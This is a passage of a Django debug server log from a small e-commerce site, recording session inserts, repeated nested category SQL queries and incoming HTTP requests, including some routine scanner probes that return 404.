140031503103744 (0.001) INSERT INTO "django_session" ("session_key", "session_data", "expire_date") VALUES ('yqsy1vdr0rpu57mk96sm7dmi82a6cntp', 'OTJhYzE3OWNiNTVlYTA2YTEwZGFmYTcxYzI2OTRhOTVkMDNhOWJmNDp7ImNhcnQiOnt9fQ==', '2020-01-03T11:49:34.354428+00:00'::timestamptz); args=('yqsy1vdr0rpu57mk96sm7dmi82a6cntp', 'OTJhYzE3OWNiNTVlYTA2YTEwZGFmYTcxYzI2OTRhOTVkMDNhOWJmNDp7ImNhcnQiOnt9fQ==', datetime.datetime(2020, 1, 3, 11, 49, 34, 354428, tzinfo=)) [20/Dec/2019 11:49:34] "GET /login/?next=/ HTTP/1.0" 200 1786 Not Found: /robots.txt [20/Dec/2019 11:49:34] "GET /robots.txt HTTP/1.0" 404 6450 Not Found: /sitemap.xml [20/Dec/2019 11:49:34] "GET /sitemap.xml HTTP/1.0" 404 6453 Not Found: /.well-known/security.txt [20/Dec/2019 11:49:35] "GET /.well-known/security.txt HTTP/1.0" 404 6492 Not Found: /favicon.ico [20/Dec/2019 11:49:35] "GET /favicon.ico HTTP/1.0" 404 6453 [20/Dec/2019 11:51:14] "GET / HTTP/1.0" 302 0 DEBUG 2019-12-20 11:51:14,795 utils 4252 140031503103744 (0.004) SELECT (1) AS "a" FROM "django_session" WHERE "django_session"."session_key" = 'd74g5x0ghlau0wc1p8jesnt43yjpjr7a' LIMIT 1; args=('d74g5x0ghlau0wc1p8jesnt43yjpjr7a',) DEBUG 2019-12-20 11:51:14,798 utils 4252 140031503103744 (0.001) INSERT INTO "django_session" ("session_key", "session_data", "expire_date") VALUES ('d74g5x0ghlau0wc1p8jesnt43yjpjr7a', 'OTJhYzE3OWNiNTVlYTA2YTEwZGFmYTcxYzI2OTRhOTVkMDNhOWJmNDp7ImNhcnQiOnt9fQ==', '2020-01-03T11:51:14.796544+00:00'::timestamptz); args=('d74g5x0ghlau0wc1p8jesnt43yjpjr7a', 'OTJhYzE3OWNiNTVlYTA2YTEwZGFmYTcxYzI2OTRhOTVkMDNhOWJmNDp7ImNhcnQiOnt9fQ==', datetime.datetime(2020, 1, 3, 11, 51, 14, 796544, tzinfo=)) [20/Dec/2019 11:51:14] "GET /login/?next=/ HTTP/1.0" 200 1786 [20/Dec/2019 11:51:22] "GET / HTTP/1.0" 302 0 [20/Dec/2019 11:52:19] "GET / HTTP/1.0" 302 0 [20/Dec/2019 11:54:54] "HEAD / HTTP/1.0" 302 0 Not Found: /robots.txt [20/Dec/2019 11:54:55] "GET /robots.txt HTTP/1.0" 404 6453 DEBUG 2019-12-20 11:54:55,160 utils 4252 140031503103744 (0.004) SELECT (1) AS "a" FROM "django_session" WHERE "django_session"."session_key" = 'ml0vpv7zqy6p32z89wzgmoo8cbcfz6de' LIMIT 1; args=('ml0vpv7zqy6p32z89wzgmoo8cbcfz6de',) DEBUG 2019-12-20 11:54:55,163 utils 4252 140031503103744 (0.001) INSERT INTO "django_session" ("session_key", "session_data", "expire_date") VALUES ('ml0vpv7zqy6p32z89wzgmoo8cbcfz6de', 'OTJhYzE3OWNiNTVlYTA2YTEwZGFmYTcxYzI2OTRhOTVkMDNhOWJmNDp7ImNhcnQiOnt9fQ==', '2020-01-03T11:54:55.160954+00:00'::timestamptz); args=('ml0vpv7zqy6p32z89wzgmoo8cbcfz6de', 'OTJhYzE3OWNiNTVlYTA2YTEwZGFmYTcxYzI2OTRhOTVkMDNhOWJmNDp7ImNhcnQiOnt9fQ==', datetime.datetime(2020, 1, 3, 11, 54, 55, 160954, tzinfo=)) [20/Dec/2019 11:54:55] "HEAD /login/?next=/ HTTP/1.0" 200 1786 [20/Dec/2019 11:54:55] "GET / HTTP/1.0" 302 0 DEBUG 2019-12-20 11:54:55,496 utils 4252 140031503103744 (0.003) SELECT (1) AS "a" FROM "django_session" WHERE "django_session"."session_key" = 'l89kcpbb62utcgxvclmuzlb0k3l3icn9' LIMIT 1; args=('l89kcpbb62utcgxvclmuzlb0k3l3icn9',) DEBUG 2019-12-20 11:54:55,498 utils 4252 140031503103744 (0.001) INSERT INTO "django_session" ("session_key", "session_data", "expire_date") VALUES ('l89kcpbb62utcgxvclmuzlb0k3l3icn9', 'OTJhYzE3OWNiNTVlYTA2YTEwZGFmYTcxYzI2OTRhOTVkMDNhOWJmNDp7ImNhcnQiOnt9fQ==', '2020-01-03T11:54:55.497139+00:00'::timestamptz); args=('l89kcpbb62utcgxvclmuzlb0k3l3icn9', 'OTJhYzE3OWNiNTVlYTA2YTEwZGFmYTcxYzI2OTRhOTVkMDNhOWJmNDp7ImNhcnQiOnt9fQ==', datetime.datetime(2020, 1, 3, 11, 54, 55, 497139, tzinfo=)) [20/Dec/2019 11:54:55] "GET /login/?next=/ HTTP/1.0" 200 1786 [20/Dec/2019 11:54:55] "GET / HTTP/1.0" 302 0 DEBUG 2019-12-20 11:54:55,761 utils 4252 140031503103744 (0.003) SELECT (1) AS "a" FROM "django_session" WHERE "django_session"."session_key" = 'b31ltg9ozxbygfxm25v8rq93er1yquq7' LIMIT 1; args=('b31ltg9ozxbygfxm25v8rq93er1yquq7',) DEBUG 2019-12-20 11:54:55,763 utils 4252 140031503103744 (0.001) INSERT INTO "django_session" ("session_key", "session_data", "expire_date") VALUES ('b31ltg9ozxbygfxm25v8rq93er1yquq7', 'OTJhYzE3OWNiNTVlYTA2YTEwZGFmYTcxYzI2OTRhOTVkMDNhOWJmNDp7ImNhcnQiOnt9fQ==', '2020-01-03T11:54:55.762138+00:00'::timestamptz); args=('b31ltg9ozxbygfxm25v8rq93er1yquq7', 'OTJhYzE3OWNiNTVlYTA2YTEwZGFmYTcxYzI2OTRhOTVkMDNhOWJmNDp7ImNhcnQiOnt9fQ==', datetime.datetime(2020, 1, 3, 11, 54, 55, 762138, tzinfo=)) [20/Dec/2019 11:54:55] "GET /login/?next=/ HTTP/1.0" 200 1786 [20/Dec/2019 11:57:22] "GET / HTTP/1.0" 302 0 [20/Dec/2019 12:05:03] "GET / HTTP/1.0" 302 0 [20/Dec/2019 12:10:05] "GET / HTTP/1.0" 302 0 [20/Dec/2019 12:17:05] "GET / HTTP/1.0" 302 0 Not Found: /index.php [20/Dec/2019 12:17:11] "GET /index.php HTTP/1.0" 404 6447 Not Found: /phpmyadmin/index.php [20/Dec/2019 12:17:12] "GET /phpmyadmin/index.php HTTP/1.0" 404 6480 [20/Dec/2019 12:22:08] "GET / HTTP/1.0" 302 0 [20/Dec/2019 12:26:36] "GET / HTTP/1.0" 302 0 DEBUG 2019-12-20 12:26:36,829 utils 4252 140031503103744 (0.002) SELECT (1) AS "a" FROM "django_session" WHERE "django_session"."session_key" = 'j4n4ns7mcwx7kg75sapdag7fwsc1vclp' LIMIT 1; args=('j4n4ns7mcwx7kg75sapdag7fwsc1vclp',) DEBUG 2019-12-20 12:26:36,831 utils 4252 140031503103744 (0.001) INSERT INTO "django_session" ("session_key", "session_data", "expire_date") VALUES ('j4n4ns7mcwx7kg75sapdag7fwsc1vclp', 'OTJhYzE3OWNiNTVlYTA2YTEwZGFmYTcxYzI2OTRhOTVkMDNhOWJmNDp7ImNhcnQiOnt9fQ==', '2020-01-03T12:26:36.830217+00:00'::timestamptz); args=('j4n4ns7mcwx7kg75sapdag7fwsc1vclp', 'OTJhYzE3OWNiNTVlYTA2YTEwZGFmYTcxYzI2OTRhOTVkMDNhOWJmNDp7ImNhcnQiOnt9fQ==', datetime.datetime(2020, 1, 3, 12, 26, 36, 830217, tzinfo=)) [20/Dec/2019 12:26:36] "GET /login/?next=/ HTTP/1.0" 200 1786 [20/Dec/2019 12:27:11] "GET / HTTP/1.0" 302 0 [20/Dec/2019 12:32:14] "GET / HTTP/1.0" 302 0 [20/Dec/2019 12:37:16] "GET / HTTP/1.0" 302 0 [20/Dec/2019 12:45:49] "GET / HTTP/1.0" 302 0 [20/Dec/2019 12:50:52] "GET / HTTP/1.0" 302 0 [20/Dec/2019 12:55:01] "GET /whm-server-status HTTP/1.0" 301 0 [20/Dec/2019 12:57:08] "GET / HTTP/1.0" 302 0 [20/Dec/2019 13:05:03] "GET / HTTP/1.0" 302 0 [20/Dec/2019 13:10:06] "GET / HTTP/1.0" 302 0 [20/Dec/2019 13:15:09] "GET / HTTP/1.0" 302 0 [20/Dec/2019 13:20:11] "GET / HTTP/1.0" 302 0 [20/Dec/2019 13:25:14] "GET / HTTP/1.0" 302 0 [20/Dec/2019 13:30:17] "GET / HTTP/1.0" 302 0 [20/Dec/2019 13:35:19] "GET / HTTP/1.0" 302 0 Not Found: /manager/html [20/Dec/2019 13:38:43] "GET /manager/html HTTP/1.0" 404 6456 [20/Dec/2019 13:40:22] "GET / HTTP/1.0" 302 0 [20/Dec/2019 13:45:00] "GET / HTTP/1.0" 302 0 [20/Dec/2019 13:45:25] "GET / HTTP/1.0" 302 0 [20/Dec/2019 13:52:55] "GET / HTTP/1.0" 302 0 [20/Dec/2019 13:57:58] "GET / HTTP/1.0" 302 0 DEBUG 2019-12-20 14:04:54,754 utils 4252 140031503103744 (0.004) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=() DEBUG 2019-12-20 14:04:54,765 utils 4252 140031503103744 (0.001) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 10 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(10,) DEBUG 2019-12-20 14:04:54,772 utils 4252 140031503103744 (0.001) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 46 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(46,) DEBUG 2019-12-20 14:04:54,775 utils 4252 140031503103744 (0.000) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 6 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(6,) DEBUG 2019-12-20 14:04:54,778 utils 4252 140031503103744 (0.000) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 14 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(14,) DEBUG 2019-12-20 14:04:54,781 utils 4252 140031503103744 (0.000) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 13 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(13,) DEBUG 2019-12-20 14:04:54,783 utils 4252 140031503103744 (0.000) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 12 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(12,) DEBUG 2019-12-20 14:04:54,785 utils 4252 140031503103744 (0.000) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 15 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(15,) DEBUG 2019-12-20 14:04:54,788 utils 4252 140031503103744 (0.001) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 1 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(1,) DEBUG 2019-12-20 14:04:54,792 utils 4252 140031503103744 (0.001) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 20 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(20,) DEBUG 2019-12-20 14:04:54,794 utils 4252 140031503103744 (0.000) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 18 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(18,) DEBUG 2019-12-20 14:04:54,797 utils 4252 140031503103744 (0.000) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 21 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(21,) DEBUG 2019-12-20 14:04:54,799 utils 4252 140031503103744 (0.000) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 19 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(19,) DEBUG 2019-12-20 14:04:54,802 utils 4252 140031503103744 (0.000) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 3 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(3,) DEBUG 2019-12-20 14:04:54,805 utils 4252 140031503103744 (0.000) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 22 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(22,) DEBUG 2019-12-20 14:04:54,807 utils 4252 140031503103744 (0.000) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 23 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(23,) DEBUG 2019-12-20 14:04:54,810 utils 4252 140031503103744 (0.000) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 24 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(24,) DEBUG 2019-12-20 14:04:54,812 utils 4252 140031503103744 (0.000) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 25 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(25,) DEBUG 2019-12-20 14:04:54,814 utils 4252 140031503103744 (0.000) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 7 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(7,) DEBUG 2019-12-20 14:04:54,818 utils 4252 140031503103744 (0.000) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 37 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(37,) DEBUG 2019-12-20 14:04:54,820 utils 4252 140031503103744 (0.000) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 39 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(39,) DEBUG 2019-12-20 14:04:54,822 utils 4252 140031503103744 (0.000) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 38 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(38,) DEBUG 2019-12-20 14:04:54,825 utils 4252 140031503103744 (0.000) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 36 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(36,) DEBUG 2019-12-20 14:04:54,827 utils 4252 140031503103744 (0.000) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 35 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(35,) DEBUG 2019-12-20 14:04:54,829 utils 4252 140031503103744 (0.000) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 4 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(4,) DEBUG 2019-12-20 14:04:54,833 utils 4252 140031503103744 (0.000) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 26 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(26,) DEBUG 2019-12-20 14:04:54,835 utils 4252 140031503103744 (0.000) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 29 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(29,) DEBUG 2019-12-20 14:04:54,837 utils 4252 140031503103744 (0.000) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 28 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(28,) DEBUG 2019-12-20 14:04:54,840 utils 4252 140031503103744 (0.000) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 27 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(27,) DEBUG 2019-12-20 14:04:54,842 utils 4252 140031503103744 (0.000) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 8 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(8,) DEBUG 2019-12-20 14:04:54,845 utils 4252 140031503103744 (0.000) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 43 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(43,) DEBUG 2019-12-20 14:04:54,848 utils 4252 140031503103744 (0.000) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 42 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(42,) DEBUG 2019-12-20 14:04:54,850 utils 4252 140031503103744 (0.000) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 41 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(41,) DEBUG 2019-12-20 14:04:54,852 utils 4252 140031503103744 (0.000) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 40 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(40,) DEBUG 2019-12-20 14:04:54,854 utils 4252 140031503103744 (0.000) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 5 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(5,) DEBUG 2019-12-20 14:04:54,858 utils 4252 140031503103744 (0.000) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 34 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(34,) DEBUG 2019-12-20 14:04:54,860 utils 4252 140031503103744 (0.000) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 33 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(33,) DEBUG 2019-12-20 14:04:54,862 utils 4252 140031503103744 (0.000) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 32 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(32,) DEBUG 2019-12-20 14:04:54,864 utils 4252 140031503103744 (0.000) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 31 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(31,) DEBUG 2019-12-20 14:04:54,867 utils 4252 140031503103744 (0.000) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 30 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(30,) DEBUG 2019-12-20 14:04:54,869 utils 4252 140031503103744 (0.000) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 11 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(11,) DEBUG 2019-12-20 14:04:54,872 utils 4252 140031503103744 (0.000) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 17 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(17,) DEBUG 2019-12-20 14:04:54,874 utils 4252 140031503103744 (0.000) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 16 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(16,) DEBUG 2019-12-20 14:04:54,876 utils 4252 140031503103744 (0.000) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 9 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(9,) DEBUG 2019-12-20 14:04:54,879 utils 4252 140031503103744 (0.000) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 44 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(44,) DEBUG 2019-12-20 14:04:54,881 utils 4252 140031503103744 (0.000) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 45 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(45,) [20/Dec/2019 14:04:54] "GET /api/v1/categories/ HTTP/1.0" 200 15396 [20/Dec/2019 14:05:03] "GET / HTTP/1.0" 302 0 Not Found: /robots.txt [20/Dec/2019 14:10:05] "GET /robots.txt HTTP/1.0" 404 6451 [20/Dec/2019 14:10:05] "GET / HTTP/1.0" 302 0 [20/Dec/2019 14:10:05] "GET / HTTP/1.0" 302 0 DEBUG 2019-12-20 14:10:07,088 utils 4252 140031503103744 (0.003) SELECT (1) AS "a" FROM "django_session" WHERE "django_session"."session_key" = 